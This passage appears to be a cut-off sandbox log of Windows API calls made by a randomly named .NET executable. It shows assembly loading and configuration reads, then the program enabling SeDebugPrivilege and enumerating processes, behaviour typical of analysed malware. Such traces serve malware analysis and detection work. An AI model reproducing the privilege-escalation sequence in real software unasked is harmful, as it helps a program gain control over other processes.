lpsz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\386fde9190d499d6645df8b90eb76242\\system.core.ni.dll.aux") returned 0x72 [0063.670] SysReAllocStringLen (in: pbstr=0x41acf0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux", psz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\386fde9190d499d6645df8b90eb76242\\system.core.ni.dll.aux", len=0x72 | out: pbstr=0x41acf0*="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\386fde9190d499d6645df8b90eb76242\\system.core.ni.dll.aux") returned 1 [0063.670] SetLastError (dwErrCode=0x0) [0063.670] GetCurrentThreadId () returned 0xba4 [0063.670] GetCurrentThreadId () returned 0xba4 [0063.670] GetCurrentThreadId () returned 0xba4 [0063.670] GetCurrentThreadId () returned 0xba4 [0063.670] GetCurrentThreadId () returned 0xba4 [0063.670] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0063.671] GetCurrentThreadId () returned 0xba4 [0063.671] GetCurrentThreadId () returned 0xba4 [0063.671] GetCurrentThreadId () returned 0xba4 [0063.671] SetEvent (hEvent=0xbc) returned 1 [0063.671] GetFileSize (in: hFile=0x264, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x384 [0063.671] GetCurrentThreadId () returned 0xba4 [0063.671] GetCurrentThreadId () returned 0xba4 [0063.671] GetCurrentThreadId () returned 0xba4 [0063.671] GetCurrentThreadId () returned 0xba4 [0063.671] GetCurrentThreadId () returned 0xba4 [0063.671] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0063.671] GetCurrentThreadId () returned 0xba4 [0063.671] GetCurrentThreadId () returned 0xba4 [0063.671] GetCurrentThreadId () returned 0xba4 [0063.671] SetEvent (hEvent=0xbc) returned 1 [0063.671] ReadFile (in: hFile=0x264, lpBuffer=0x72f5a0, nNumberOfBytesToRead=0x384, lpNumberOfBytesRead=0x41ada4, lpOverlapped=0x0 | out: lpBuffer=0x72f5a0*, lpNumberOfBytesRead=0x41ada4*=0x384, lpOverlapped=0x0) returned 1 [0063.673] GetCurrentThreadId () returned 0xba4 [0063.673] ResetEvent (hEvent=0xb8) returned 1 [0063.673] GetCurrentThreadId () returned 0xba4 [0063.673] GetCurrentThreadId () returned 0xba4 [0063.673] GetCurrentThreadId () returned 0xba4 [0063.673] GetCurrentThreadId () returned 0xba4 [0063.673] ResetEvent (hEvent=0xb8) returned 1 [0063.673] GetCurrentThreadId () returned 0xba4 [0063.673] GetCurrentThreadId () returned 0xba4 [0063.673] SetEvent (hEvent=0xbc) returned 1 [0063.674] SetEvent (hEvent=0xb8) returned 1 [0063.674] CloseHandle (hObject=0x264) returned 1 [0063.687] SysReAllocStringLen (in: pbstr=0x419ba0*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x419ba0*="kernel32.dll") returned 1 [0063.687] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0063.688] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0063.690] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0063.691] GetCurrentThreadId () returned 0xba4 [0063.691] ResetEvent (hEvent=0xb8) returned 1 [0063.691] GetCurrentThreadId () returned 0xba4 [0063.691] GetCurrentThreadId () returned 0xba4 [0063.691] GetCurrentThreadId () returned 0xba4 [0063.691] GetCurrentThreadId () returned 0xba4 [0063.691] ResetEvent (hEvent=0xb8) returned 1 [0063.691] GetCurrentThreadId () returned 0xba4 [0063.691] GetCurrentThreadId () returned 0xba4 [0063.691] SetEvent (hEvent=0xbc) returned 1 [0063.691] SetEvent (hEvent=0xb8) returned 1 [0063.691] CloseHandle (hObject=0x264) returned 1 [0063.711] SysReAllocStringLen (in: pbstr=0x41a2a8*=0x0, psz="System.Core.ni.dll", len=0x12 | out: pbstr=0x41a2a8*="System.Core.ni.dll") returned 1 [0063.711] CharLowerBuffW (in: lpsz="System.Core.ni.dll", cchLength=0x12 | out: lpsz="system.core.ni.dll") returned 0x12 [0063.711] LoadLibraryExW (lpLibFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll", hFile=0x0, dwFlags=0x8) returned 0x71e90000 [0063.807] GetLastError () returned 0x0 [0063.818] SysReAllocStringLen (in: pbstr=0x41abe8*=0x0, psz="System.Configuration.ni.dll", len=0x1b | out: pbstr=0x41abe8*="System.Configuration.ni.dll") returned 1 [0063.818] CharLowerBuffW (in: lpsz="System.Configuration.ni.dll", cchLength=0x1b | out: lpsz="system.configuration.ni.dll") returned 0x1b [0063.818] LoadLibraryExW (lpLibFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\766a572f745b54553bd34406293b4f78\\System.Configuration.ni.dll", hFile=0x0, dwFlags=0x8) returned 0x75260000 [0063.840] GetLastError () returned 0x0 [0063.931] SysReAllocStringLen (in: pbstr=0x41dc5c*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x41dc5c*="kernel32") returned 1 [0063.931] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0063.932] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0063.935] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringOrdinal") returned 0x76d60608 [0063.939] GetProcAddress (hModule=0x76d30000, lpProcName="GetFullPathName") returned 0x0 [0063.942] GetProcAddress (hModule=0x76d30000, lpProcName="GetFullPathNameW") returned 0x76d440d4 [0063.942] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", nBufferLength=0x105, lpBuffer=0x41d868, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", lpFilePart=0x0) returned 0x41 [0063.943] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", nBufferLength=0x105, lpBuffer=0x41d814, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", lpFilePart=0x0) returned 0x41 [0063.974] CreateFileW (lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\427ed7b1258457fdb8be46e9dd87cbd2\\system.xml.ni.dll.aux"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0063.974] GetLastError () returned 0x0 [0063.975] SysReAllocStringLen (in: pbstr=0x41b3f0*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux", len=0x70 | out: pbstr=0x41b3f0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux") returned 1 [0063.975] GetThreadLocale () returned 0x409 [0063.975] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0063.975] GetThreadLocale () returned 0x409 [0063.975] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0063.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux", nBufferLength=0x104, lpBuffer=0x41b174, lpFilePart=0x41b170 | out: lpBuffer="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux", lpFilePart=0x41b170*="System.Xml.ni.dll.aux") returned 0x70 [0063.975] SysReAllocStringLen (in: pbstr=0x41b3f0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux", psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux", len=0x70 | out: pbstr=0x41b3f0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux") returned 1 [0063.975] SysReAllocStringLen (in: pbstr=0x41b3a0*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux", len=0x70 | out: pbstr=0x41b3a0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux") returned 1 [0063.975] CharLowerBuffW (in: lpsz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux", cchLength=0x70 | out: lpsz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\427ed7b1258457fdb8be46e9dd87cbd2\\system.xml.ni.dll.aux") returned 0x70 [0063.975] SysReAllocStringLen (in: pbstr=0x41b3f0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll.aux", psz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\427ed7b1258457fdb8be46e9dd87cbd2\\system.xml.ni.dll.aux", len=0x70 | out: pbstr=0x41b3f0*="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\427ed7b1258457fdb8be46e9dd87cbd2\\system.xml.ni.dll.aux") returned 1 [0063.975] SetLastError (dwErrCode=0x0) [0063.975] GetCurrentThreadId () returned 0xba4 [0063.975] GetCurrentThreadId () returned 0xba4 [0063.975] GetCurrentThreadId () returned 0xba4 [0063.975] GetCurrentThreadId () returned 0xba4 [0063.975] GetCurrentThreadId () returned 0xba4 [0063.975] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0063.975] GetCurrentThreadId () returned 0xba4 [0063.975] GetCurrentThreadId () returned 0xba4 [0063.975] GetCurrentThreadId () returned 0xba4 [0063.975] SetEvent (hEvent=0xbc) returned 1 [0063.976] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ec [0063.976] GetCurrentThreadId () returned 0xba4 [0063.976] GetCurrentThreadId () returned 0xba4 [0063.976] GetCurrentThreadId () returned 0xba4 [0063.976] GetCurrentThreadId () returned 0xba4 [0063.976] GetCurrentThreadId () returned 0xba4 [0063.976] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0063.976] GetCurrentThreadId () returned 0xba4 [0063.976] GetCurrentThreadId () returned 0xba4 [0063.976] GetCurrentThreadId () returned 0xba4 [0063.976] SetEvent (hEvent=0xbc) returned 1 [0063.976] ReadFile (in: hFile=0x260, lpBuffer=0x72c0a0, nNumberOfBytesToRead=0x2ec, lpNumberOfBytesRead=0x41b4a4, lpOverlapped=0x0 | out: lpBuffer=0x72c0a0*, lpNumberOfBytesRead=0x41b4a4*=0x2ec, lpOverlapped=0x0) returned 1 [0063.978] GetCurrentThreadId () returned 0xba4 [0063.978] ResetEvent (hEvent=0xb8) returned 1 [0063.978] GetCurrentThreadId () returned 0xba4 [0063.978] GetCurrentThreadId () returned 0xba4 [0063.979] GetCurrentThreadId () returned 0xba4 [0063.979] GetCurrentThreadId () returned 0xba4 [0063.979] ResetEvent (hEvent=0xb8) returned 1 [0063.979] GetCurrentThreadId () returned 0xba4 [0063.979] GetCurrentThreadId () returned 0xba4 [0063.979] SetEvent (hEvent=0xbc) returned 1 [0063.979] SetEvent (hEvent=0xb8) returned 1 [0063.979] CloseHandle (hObject=0x260) returned 1 [0063.992] SysReAllocStringLen (in: pbstr=0x41a2a0*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x41a2a0*="kernel32.dll") returned 1 [0063.992] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0063.992] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0063.995] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0063.995] GetCurrentThreadId () returned 0xba4 [0063.996] ResetEvent (hEvent=0xb8) returned 1 [0063.996] GetCurrentThreadId () returned 0xba4 [0063.996] GetCurrentThreadId () returned 0xba4 [0063.996] GetCurrentThreadId () returned 0xba4 [0063.996] GetCurrentThreadId () returned 0xba4 [0063.996] ResetEvent (hEvent=0xb8) returned 1 [0063.996] GetCurrentThreadId () returned 0xba4 [0063.996] GetCurrentThreadId () returned 0xba4 [0063.996] SetEvent (hEvent=0xbc) returned 1 [0063.996] SetEvent (hEvent=0xb8) returned 1 [0063.996] CloseHandle (hObject=0x260) returned 1 [0064.001] SysReAllocStringLen (in: pbstr=0x41a9a8*=0x0, psz="System.Xml.ni.dll", len=0x11 | out: pbstr=0x41a9a8*="System.Xml.ni.dll") returned 1 [0064.001] CharLowerBuffW (in: lpsz="System.Xml.ni.dll", cchLength=0x11 | out: lpsz="system.xml.ni.dll") returned 0x11 [0064.001] LoadLibraryExW (lpLibFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\427ed7b1258457fdb8be46e9dd87cbd2\\System.Xml.ni.dll", hFile=0x0, dwFlags=0x8) returned 0x71770000 [0064.111] GetLastError () returned 0x0 [0064.154] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessW") returned 0x0 [0064.155] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0064.155] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessTokenW") returned 0x0 [0064.155] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41dbbc | out: TokenHandle=0x41dbbc*=0x25c) returned 1 [0064.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x41d69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0064.164] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesEx") returned 0x0 [0064.167] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesExW") returned 0x76d44574 [0064.167] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x41dbbc | out: lpFileInformation=0x41dbbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0064.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x41d668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0064.171] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x41dbbc | out: lpFileInformation=0x41dbbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0064.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x41d5f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0064.174] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0064.174] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x41dae8) returned 1 [0064.176] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFile") returned 0x0 [0064.177] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x260 [0064.180] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0064.180] GetFileType (hFile=0x260) returned 0x1 [0064.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x41dae4) returned 1 [0064.180] GetFileType (hFile=0x260) returned 0x1 [0064.202] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x41dbb0 | out: lpFileSizeHigh=0x41dbb0*=0x0) returned 0x8c8f [0064.205] ReadFile (in: hFile=0x260, lpBuffer=0x3358f4c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x41db6c, lpOverlapped=0x0 | out: lpBuffer=0x3358f4c*, lpNumberOfBytesRead=0x41db6c*=0x1000, lpOverlapped=0x0) returned 1 [0064.229] ReadFile (in: hFile=0x260, lpBuffer=0x3358f4c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x41da08, lpOverlapped=0x0 | out: lpBuffer=0x3358f4c*, lpNumberOfBytesRead=0x41da08*=0x1000, lpOverlapped=0x0) returned 1 [0064.236] ReadFile (in: hFile=0x260, lpBuffer=0x3358f4c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x41d8bc, lpOverlapped=0x0 | out: lpBuffer=0x3358f4c*, lpNumberOfBytesRead=0x41d8bc*=0x1000, lpOverlapped=0x0) returned 1 [0064.238] ReadFile (in: hFile=0x260, lpBuffer=0x3358f4c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x41d8bc, lpOverlapped=0x0 | out: lpBuffer=0x3358f4c*, lpNumberOfBytesRead=0x41d8bc*=0x1000, lpOverlapped=0x0) returned 1 [0064.238] ReadFile (in: hFile=0x260, lpBuffer=0x3358f4c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x41d8bc, lpOverlapped=0x0 | out: lpBuffer=0x3358f4c*, lpNumberOfBytesRead=0x41d8bc*=0x1000, lpOverlapped=0x0) returned 1 [0064.239] ReadFile (in: hFile=0x260, lpBuffer=0x3358f4c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x41d7f4, lpOverlapped=0x0 | out: lpBuffer=0x3358f4c*, lpNumberOfBytesRead=0x41d7f4*=0x1000, lpOverlapped=0x0) returned 1 [0064.243] ReadFile (in: hFile=0x260, lpBuffer=0x3358f4c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x41d970, lpOverlapped=0x0 | out: lpBuffer=0x3358f4c*, lpNumberOfBytesRead=0x41d970*=0x1000, lpOverlapped=0x0) returned 1 [0064.244] ReadFile (in: hFile=0x260, lpBuffer=0x3358f4c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x41d884, lpOverlapped=0x0 | out: lpBuffer=0x3358f4c*, lpNumberOfBytesRead=0x41d884*=0x1000, lpOverlapped=0x0) returned 1 [0064.244] ReadFile (in: hFile=0x260, lpBuffer=0x3358f4c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x41d884, lpOverlapped=0x0 | out: lpBuffer=0x3358f4c*, lpNumberOfBytesRead=0x41d884*=0xc8f, lpOverlapped=0x0) returned 1 [0064.245] ReadFile (in: hFile=0x260, lpBuffer=0x3358f4c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x41d944, lpOverlapped=0x0 | out: lpBuffer=0x3358f4c*, lpNumberOfBytesRead=0x41d944*=0x0, lpOverlapped=0x0) returned 1 [0064.245] CloseHandle (hObject=0x260) returned 1 [0064.246] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41dcf0 | out: TokenHandle=0x41dcf0*=0x260) returned 1 [0064.247] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41dcf0 | out: TokenHandle=0x41dcf0*=0x264) returned 1 [0064.247] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41dbbc | out: TokenHandle=0x41dbbc*=0x268) returned 1 [0064.248] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x41dbbc | out: lpFileInformation=0x41dbbc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0064.248] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", nBufferLength=0x105, lpBuffer=0x41d668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", lpFilePart=0x0) returned 0x41 [0064.248] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x41dbbc | out: lpFileInformation=0x41dbbc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0064.249] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41dcf0 | out: TokenHandle=0x41dcf0*=0x26c) returned 1 [0064.249] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41dcf0 | out: TokenHandle=0x41dcf0*=0x270) returned 1 [0064.271] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41dab8 | out: TokenHandle=0x41dab8*=0x274) returned 1 [0064.294] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41dac8 | out: TokenHandle=0x41dac8*=0x278) returned 1 [0064.322] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x41d790 | out: phkResult=0x41d790*=0x0) returned 0x2 [0064.332] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x41eca8 | out: phkResult=0x41eca8*=0x27c) returned 0x0 [0064.333] RegQueryValueExW (in: hKey=0x27c, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x41ecc4, lpData=0x0, lpcbData=0x41ecc0*=0x0 | out: lpType=0x41ecc4*=0x0, lpData=0x0, lpcbData=0x41ecc0*=0x0) returned 0x2 [0064.333] RegCloseKey (hKey=0x27c) returned 0x0 [0064.349] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValue") returned 0x0 [0064.349] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0064.352] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x41e5fc | out: lpLuid=0x41e5fc*(LowPart=0x14, HighPart=0)) returned 1 [0064.357] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0064.358] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessTokenW") returned 0x0 [0064.358] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x41e5f8 | out: TokenHandle=0x41e5f8*=0x27c) returned 1 [0064.358] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0064.358] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivilegesW") returned 0x0 [0064.358] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x3375ae8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0064.359] CloseHandle (hObject=0x27c) returned 1 [0064.362] SysReAllocStringLen (in: pbstr=0x41e074*=0x0, psz="ntdll.dll", len=0x9 | out: pbstr=0x41e074*="ntdll.dll") returned 1 [0064.362] CharLowerBuffW (in: lpsz="ntdll.dll", cchLength=0x9 | out: lpsz="ntdll.dll") returned 0x9 [0064.362] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ntdll.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0064.362] GetLastError () returned 0x7e [0064.362] SetLastError (dwErrCode=0x7e) [0064.367] SysReAllocStringLen (in: pbstr=0x41e074*=0x0, psz="ntdll.dll", len=0x9 | out: pbstr=0x41e074*="ntdll.dll") returned 1 [0064.367] CharLowerBuffW (in: lpsz="ntdll.dll", cchLength=0x9 | out: lpsz="ntdll.dll") returned 0x9 [0064.367] LoadLibraryExW (lpLibFileName="ntdll.dll", hFile=0x0, dwFlags=0x0) returned 0x77c40000 [0064.367] GetLastError () returned 0x0 [0064.368] GetProcAddress (hModule=0x77c40000, lpProcName="NtQuerySystemInformation") returned 0x77c5fda0 [0064.368] GetProcAddress (hModule=0x77c40000, lpProcName="NtQuerySystemInformationW") returned 0x0 [0064.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x43554d0, Length=0x20000, ResultLength=0x41ecdc | out: SystemInformation=0x43554d0, ResultLength=0x41ecdc*=0xd260) returned 0x0 [0064.403] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41ecbc | out: TokenHandle=0x41ecbc*=0x27c) returned 1 [0064.410] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0064.410] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0064.411] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformationW") returned 0x0 [0064.411] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x41ecbc | out: TokenInformation=0x0, ReturnLength=0x41ecbc) returned 0 [0064.413] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0064.416] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAllocW") returned 0x0 [0064.416] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x727248 [0064.416] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x8, TokenInformation=0x727248, 